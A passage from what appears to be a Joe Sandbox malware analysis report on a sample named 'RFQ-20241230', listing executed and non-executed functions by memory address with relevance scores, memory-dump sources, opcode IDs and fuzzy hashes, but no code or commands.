                            Function 012DD3D8 Relevance: .1, Instructions: 75COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1357874954.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_12dd000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b87e640ddf84d7d496a5a05d14f07dff3898049903821aea7558cf8f51bf9a16
                            • Instruction ID: 4769acba224c2d7800fdf0c31b118a6a73984896139bb2d8c01e6c4ca6b8fa3b
                            • Opcode Fuzzy Hash: b87e640ddf84d7d496a5a05d14f07dff3898049903821aea7558cf8f51bf9a16
                            • Instruction Fuzzy Hash: 95214575510748DFDB01DF94C9C0B6ABB65FB88324F24C16DE90A0B286C336E446CBA2
                            Function 05BD064C Relevance: .1, Instructions: 74COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4804dba3fe4d3ce3448c5398a4700a4b457d3ebe42651aab09f113df12ae46bd
                            • Instruction ID: 7c5868d77a655d3c34b1dd47de6bb241450dabd3319a65460cbf4f8e3ba86d37
                            • Opcode Fuzzy Hash: 4804dba3fe4d3ce3448c5398a4700a4b457d3ebe42651aab09f113df12ae46bd
                            • Instruction Fuzzy Hash: 2A313C302106018FC754DB28C898BA6B7E2FF89725F5485A9E09ECB361DF71BC86CB50
                            Function 012ED01C Relevance: .1, Instructions: 72COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1357983369.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_12ed000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1dd7cbe8b8ea27b4d49fe04a4aa17d98411b46feaf06a58736fb694acafcb241
                            • Instruction ID: 4f4aa3a2da33ad5646740e95e0203906698210bc19a49f6f5c3b23973e1dd9b1
                            • Opcode Fuzzy Hash: 1dd7cbe8b8ea27b4d49fe04a4aa17d98411b46feaf06a58736fb694acafcb241
                            • Instruction Fuzzy Hash: 78210071614348DFDB15DF64D8C8B26BFA5FB84314F68C569D90A4B282C376D807CA62
                            Function 012ED1D4 Relevance: .1, Instructions: 72COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1357983369.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_12ed000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4783a52eba88ff304c01142793d500c08fdea4561d3944cdc9eb1798b44ce46f
                            • Instruction ID: 7973d973d055008800f6f548ef209b5735989895bffa2e26a56d743a636569e6
                            • Opcode Fuzzy Hash: 4783a52eba88ff304c01142793d500c08fdea4561d3944cdc9eb1798b44ce46f
                            • Instruction Fuzzy Hash: 18213775514348DFDB01DF94C5C4B25BBA5FB84324F64C56DD9094B283C376D806CA61
                            Function 05BD8CAF Relevance: .1, Instructions: 69COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9d4596694fd15594be540f9c79934bfbb86e3c0fde0ace35cca311de12fbf712
                            • Instruction ID: 515e29db3631d593e34d37f1a6388ab49ecbcc366eb470d186c082d198937233
                            • Opcode Fuzzy Hash: 9d4596694fd15594be540f9c79934bfbb86e3c0fde0ace35cca311de12fbf712
                            • Instruction Fuzzy Hash: 4F117C753085018B9B196B25951963DA7E7EFD465231A00AEE907CB3D4FF38EC02CBB6
                            Function 05BDD560 Relevance: .1, Instructions: 64COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b326102d81c425e6e9ad40ed1c268c908884c055fc5695f7dae33dc6848cc863
                            • Instruction ID: 9fa1a167c91768a7424c0f9425c5a5262558e59b4da20d9d7519e8f84b5d3f8a
                            • Opcode Fuzzy Hash: b326102d81c425e6e9ad40ed1c268c908884c055fc5695f7dae33dc6848cc863
                            • Instruction Fuzzy Hash: 8B114F31705701CFC7396B38940452AB7A6AFC66797214BBDD06A4A6E0EF32E842CB20
                            Function 05BDFF3B Relevance: .1, Instructions: 61COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9bb71c2053e2ab7dee2664b9d7738db673193a3da49dd9744d4cfc0a588154ed
                            • Instruction ID: dd79f877e9dba54e6f0d7feeba44d355ee452527b9ba8a468c9a65ded2604895
                            • Opcode Fuzzy Hash: 9bb71c2053e2ab7dee2664b9d7738db673193a3da49dd9744d4cfc0a588154ed
                            • Instruction Fuzzy Hash: 4101B52570D6C44FCB069774992457CFFA2AF8711075541EAC44ADB392EA29DC07C7A1
                            Function 05BD8398 Relevance: .1, Instructions: 61COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d5be13832320cdb6a05bb9e4a9e246395f1893e40dc2bccf619eb2372efdd6f9
                            • Instruction ID: 7e0a655f5b21bfbe307e5e07397d478c926789da8ccf83fba2cc7db61ecb9291
                            • Opcode Fuzzy Hash: d5be13832320cdb6a05bb9e4a9e246395f1893e40dc2bccf619eb2372efdd6f9
                            • Instruction Fuzzy Hash: 2B115E317046048FC7249F39D45482DB7F6FF8621671445ADF40ADB270EA31E885CB61
                            Function 05BD6A7E Relevance: .1, Instructions: 58COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8a9c4e717a38c74c0d9b97a67de6db2bc8ebc09019a80cd4d3c820146ccbc634
                            • Instruction ID: 2e71c7df96968747224250ab4251ef942bd70a854dea636d3beb4738bd93b04b
                            • Opcode Fuzzy Hash: 8a9c4e717a38c74c0d9b97a67de6db2bc8ebc09019a80cd4d3c820146ccbc634
                            • Instruction Fuzzy Hash: 91115170B006048FC714DF79D49495AF7F2FF88215B2485ADD4159B3A2DB71EC06CB61
                            Function 012DD4BF Relevance: .1, Instructions: 56COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1357874954.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_12dd000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                            • Instruction ID: 51d311ac370cb7ef39ddd1b68c08aeaf1487fbcda3edb8ffb929fbf38e4a867e
                            • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                            • Instruction Fuzzy Hash: 16110376404684CFCB12CF54D5C0B16BF71FB84318F24C6A9D9090B697C336D45ACBA1
                            Function 012DD3D3 Relevance: .1, Instructions: 56COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1357874954.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_12dd000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                            • Instruction ID: 76bfe22ca3f99609b59b396a09a9abe712959628e9a4341b72a52b0a896c2904
                            • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                            • Instruction Fuzzy Hash: B4110376404684DFCB12CF44D5C0B56BF71FB84324F24C2A9D9090B697C33AE456CBA1
                            Function 05BDCF91 Relevance: .1, Instructions: 53COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 54a7751ce45f62decdffedd951bd9f87673c8526d3c8ddc56a5ae578b42dd8a0
                            • Instruction ID: e937b83cf36142a6b6d6a7190b6f5ccfbb46a8cd8d105124526974cf72390703
                            • Opcode Fuzzy Hash: 54a7751ce45f62decdffedd951bd9f87673c8526d3c8ddc56a5ae578b42dd8a0
                            • Instruction Fuzzy Hash: 52016832604298AFCF029AA898201EE7B61EF47230B2845B6D495D7142E679AA1583E3
                            Function 012ED1CF Relevance: .1, Instructions: 53COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1357983369.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_12ed000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                            • Instruction ID: 8198a7f13034fb5e4c73b26459a705cbc9b229c763afe361541d634e21313c06
                            • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                            • Instruction Fuzzy Hash: FE11BB75504284DFDB02CF54C5C4B15BBA1FB84224F28C6AAD9494B697C33AD44ACB61
                            Function 012ED017 Relevance: .1, Instructions: 53COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1357983369.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_12ed000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                            • Instruction ID: 9962a0c88aed504f4fcadabaa62d573e03ac021d21bf365c9f088237270ea6f3
                            • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                            • Instruction Fuzzy Hash: 1F11DD75504284CFCB12CF54D5C8B15FFA2FB84314F28C6AAD9094B696C33BD44ACBA2
                            Function 05BD8387 Relevance: .1, Instructions: 51COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 327c577a0d7a76e9a3ae33c83c2b2035bce85a78a45656b6cbc13b3e7c454b99
                            • Instruction ID: d6682c1e988911615bad24ab1429c7b64b523bb7c181b434d7f16fef40117a6c
                            • Opcode Fuzzy Hash: 327c577a0d7a76e9a3ae33c83c2b2035bce85a78a45656b6cbc13b3e7c454b99
                            • Instruction Fuzzy Hash: 70018036208640CFC7259F39D944869BBB5FF8622231545EEF44ACB272EA35E885CB71
                            Function 05BDD681 Relevance: .0, Instructions: 48COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8f8a42be146bc45b371e20473f0d9d9b05562ad55c4068052a5130785f7e1e73
                            • Instruction ID: 4e775e87cd03296b78d8ffd76885cba51b7112f816adb3a053591220679e814d
                            • Opcode Fuzzy Hash: 8f8a42be146bc45b371e20473f0d9d9b05562ad55c4068052a5130785f7e1e73
                            • Instruction Fuzzy Hash: 2601B172A042058FD715CB68E881BA5B7F5FF49214F1880AAD50CCB251EB31EC55C7A1
                            Function 012DD745 Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1357874954.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_12dd000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 902fc34b6f92f326b1de3c79da8d00ce2560296810c199a9c6bb92aea6eaaad6
                            • Instruction ID: 99fcecb7dbd3285bddcae36321cda4067df0de6405fcc7ad74e6df7cfc3aeb4d
                            • Opcode Fuzzy Hash: 902fc34b6f92f326b1de3c79da8d00ce2560296810c199a9c6bb92aea6eaaad6
                            • Instruction Fuzzy Hash: DD012B31114B889BF7144E95CD84B27BF9CDF41224F04C59AEE084A2C2D6799440CBB2
                            Function 05BDF49F Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 81035033292080432fbd38ca17f75fe9e7a56b8fc0b7354dcab98e169c25d933
                            • Instruction ID: 79c54f025e1a819083764dadeb2147fb910e5da0bcc83c086b7d3ceb39a89098
                            • Opcode Fuzzy Hash: 81035033292080432fbd38ca17f75fe9e7a56b8fc0b7354dcab98e169c25d933
                            • Instruction Fuzzy Hash: 8C01F23224D7008FDB25CB14D8503B6FBE1AF05225F1445EEC04B976A1E739E981CBA1
                            Function 05BDF4B0 Relevance: .0, Instructions: 39COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9876899e509d61e15998ebe734a16491342d7957d877425f846d209bd5117233
                            • Instruction ID: 52f6c2657dafa0fb1530f7a27fb8fc6aefc2a12f341c3e4c9cd40e4299302708
                            • Opcode Fuzzy Hash: 9876899e509d61e15998ebe734a16491342d7957d877425f846d209bd5117233
                            • Instruction Fuzzy Hash: 4AF0AF312097049BEB28DB19D450776F7E5EF48368F0085ADD40B876A0EB75F981CBA0
                            Function 05BD8C29 Relevance: .0, Instructions: 39COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1a019de16708dbe44534992b5956a5f8c6809075c1f8e4762c3c6ac583b9dfc5
                            • Instruction ID: d358fd30cf6890d1375771048c41b060794120d8d95698b6aeec4464eadab93c
                            • Opcode Fuzzy Hash: 1a019de16708dbe44534992b5956a5f8c6809075c1f8e4762c3c6ac583b9dfc5
                            • Instruction Fuzzy Hash: A601A4313053448FC711EB28C59476977E6FF85212F1904E6E646CB2A1EE74ED05CB61
                            Function 05BD62D8 Relevance: .0, Instructions: 39COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: faee49b1e16060d2824191b93616b23ff6ec5abfd75a78e39126ffdf8676503d
                            • Instruction ID: 0ac0e1f8197cf7490a18100ba3aa625a93b059ce78954c5330b2d4b2e68d592e
                            • Opcode Fuzzy Hash: faee49b1e16060d2824191b93616b23ff6ec5abfd75a78e39126ffdf8676503d
                            • Instruction Fuzzy Hash: E9F090313012098BC714E729C984B7AB3E7FBD5213F0848EAE606CB264EE70EC0587B1
                            Function 012DD744 Relevance: .0, Instructions: 36COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1357874954.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_12dd000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e72f44928174245a952bd494c99cfdd18c8cfc818c51a1a4ec9897e0ca2e1837
                            • Instruction ID: 46706cdf8773aa7dac49f1f74e016161f45d3151a8e881e663ef8ba0d5bc42d7
                            • Opcode Fuzzy Hash: e72f44928174245a952bd494c99cfdd18c8cfc818c51a1a4ec9897e0ca2e1837
                            • Instruction Fuzzy Hash: 40F062714047849FF7158E5ACD84B62FF98EF41634F18C49AEE085A2C6C2799844CBB1
                            Function 05BDD4CA Relevance: .0, Instructions: 31COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1dfd20d32907cfea4e6ea874b16b321e70a89358b717155b41736577580035c0
                            • Instruction ID: 0f1c7bc8dc1543f426184b8b40b156761e31d0bacf958ad838e1cbe9819420ad
                            • Opcode Fuzzy Hash: 1dfd20d32907cfea4e6ea874b16b321e70a89358b717155b41736577580035c0
                            • Instruction Fuzzy Hash: 9D01FB31A00219CFDB04DF68C484E98B3B1FF48210F1582A9E1559B261DB34AC45CF60
                            Function 05BDFC00 Relevance: .0, Instructions: 29COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9b0539acf0a6243e09218503ef6d2609f95f80b89e5df7dd1caab3e35c39c144
                            • Instruction ID: 087e7a0c0c60abf5d0296980424a49af48fee6edb185be97be82d3b1f8133f73
                            • Opcode Fuzzy Hash: 9b0539acf0a6243e09218503ef6d2609f95f80b89e5df7dd1caab3e35c39c144
                            • Instruction Fuzzy Hash: 28E026327042165B8718A6AEA48492BF3DEEFCD42035804BEE60EC7350EDA1EC0843F0
                            Function 05BDF517 Relevance: .0, Instructions: 27COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ebd41741f5bf467764663f7f886c9bbe07ab55cd44e19e094d18c5f4322b274b
                            • Instruction ID: 0128f29efa6b216e99dbd1daddd53a8c4831575ad624c3323eb32e7b39a013df
                            • Opcode Fuzzy Hash: ebd41741f5bf467764663f7f886c9bbe07ab55cd44e19e094d18c5f4322b274b
                            • Instruction Fuzzy Hash: 55E0D8277882004FC305965DA4545F9A7D6ABCE13176500BFD10DD7762D9255C0A8371
                            Function 05BDD960 Relevance: .0, Instructions: 27COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b281fb719b1d945ff06b8e74cba7f0670d9c3e7be5433a98d310e769fa6a59d8
                            • Instruction ID: faed22883807c3028938705e7c1aaa090096f1cfe4790e4f0cc781bfa9df1553
                            • Opcode Fuzzy Hash: b281fb719b1d945ff06b8e74cba7f0670d9c3e7be5433a98d310e769fa6a59d8
                            • Instruction Fuzzy Hash: 84E086313950116B8608A75EE4C487EB7DAEBCE66275144BAF10DC7351DD219C0943A1
                            Function 05BD8E21 Relevance: .0, Instructions: 20COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 783fd880bd0a4ac481a853c00e2a423e83734a18b325b59680b7402b15b793fa
                            • Instruction ID: 65f3e66967d16562e77777ad4e35cbc161f7e4c12efb5736543fe5ce59679992
                            • Opcode Fuzzy Hash: 783fd880bd0a4ac481a853c00e2a423e83734a18b325b59680b7402b15b793fa
                            • Instruction Fuzzy Hash: F1E04F351493418FC7268B28D54C550BF30AF4323AB3943EAE8598B5F3D231DA5BCBA1
                            Function 05BDD34E Relevance: .0, Instructions: 13COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 183631cbd0c51f07084af0564e3dd0af1468d4b2bca4690609256882faf97e43
                            • Instruction ID: 6c8667525a0e20d3564853e1215852ed97146ada8957f9d0b6736eba1c4e5b91
                            • Opcode Fuzzy Hash: 183631cbd0c51f07084af0564e3dd0af1468d4b2bca4690609256882faf97e43
                            • Instruction Fuzzy Hash: E1D09239A40109CFCB00CF94E589AECB7F1FB88329F2441A6D609AB261C3366D55CF90

                            Non-executed Functions

                            Function 05BDE260 Relevance: .4, Instructions: 382COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 56cc8e9d2a250a5f9c53b5d08c4446b060d56e1bf92a587c785c47ab0aec580b
                            • Instruction ID: 60e82be63010d043f570d05e61f4a6325d86b29341be8366768e57f2e74ae172
                            • Opcode Fuzzy Hash: 56cc8e9d2a250a5f9c53b5d08c4446b060d56e1bf92a587c785c47ab0aec580b
                            • Instruction Fuzzy Hash: 2812CA75D1071A8FCB55DF68C880AE9F7B1FF49300F1586AAD459AB211EB70AAC4CF90
                            Function 05BDE250 Relevance: .4, Instructions: 382COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3f929a63cebfb9bac158eaddb996e64bac1bbce68d064fd521b8ad76e2c3aec1
                            • Instruction ID: e681149978774edab1d063becf3f1e238d96a2cdb72500ebca5a21fdd2d21e01
                            • Opcode Fuzzy Hash: 3f929a63cebfb9bac158eaddb996e64bac1bbce68d064fd521b8ad76e2c3aec1
                            • Instruction Fuzzy Hash: 4012B975D0071A8FCB55DF68C880AE9F7B1FF49300F1586AAD459AB211EB70AAC5CF90
                            Function 095F2F70 Relevance: .3, Instructions: 312COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1367126756.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09530000, based on PE: true
                            • Associated: 00000000.00000002.1366672839.0000000009530000.00000004.08000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_9530000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b1e8f696a5a045c7227c729d5c413231525bb882840167f3f27cf5785a744522
                            • Instruction ID: 7d4fd5ae840974fa6d396fd1136e62eefac539776805c4ac625aed9e56753d5d
                            • Opcode Fuzzy Hash: b1e8f696a5a045c7227c729d5c413231525bb882840167f3f27cf5785a744522
                            • Instruction Fuzzy Hash: 80E11674E002198FDB14CFA9C5909AEFBB2FB89315F248169D915AB356C731AD41CFA0
                            Function 095F3C18 Relevance: .3, Instructions: 312COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1367126756.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09530000, based on PE: true
                            • Associated: 00000000.00000002.1366672839.0000000009530000.00000004.08000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_9530000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1bb3e3688e0bbe38799704ac44f26ee2b92e1e380f4775143b77dfb81e5b8655
                            • Instruction ID: cee7d8bc3477ce06078cdb91eaa2e5d8a921b7fa4cd691d7de461977d2db51dc
                            • Opcode Fuzzy Hash: 1bb3e3688e0bbe38799704ac44f26ee2b92e1e380f4775143b77dfb81e5b8655
                            • Instruction Fuzzy Hash: 5AE10574E002198FDB14CFA9C590AAEFBB2FF88355F248169D915AB316C735AD41CFA0
                            Function 095F37E0 Relevance: .3, Instructions: 312COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1367126756.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09530000, based on PE: true
                            • Associated: 00000000.00000002.1366672839.0000000009530000.00000004.08000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_9530000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 979940f9721fba77e8576b80e39798e4002ac20f9c22d6e561223cb04ef5b3fb
                            • Instruction ID: 65d205adacfa050a1974c07ce65135217677260df54ab0ac0009307f07252315
                            • Opcode Fuzzy Hash: 979940f9721fba77e8576b80e39798e4002ac20f9c22d6e561223cb04ef5b3fb
                            • Instruction Fuzzy Hash: 2DE11674E002198FDB14CFA9C590AAEFBB2FB88315F248169D955AB316C735AD41CFA0
                            Function 095F33A8 Relevance: .3, Instructions: 312COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1367126756.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09530000, based on PE: true
                            • Associated: 00000000.00000002.1366672839.0000000009530000.00000004.08000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_9530000_RFQ-20241230.jbxd
                            Similarity
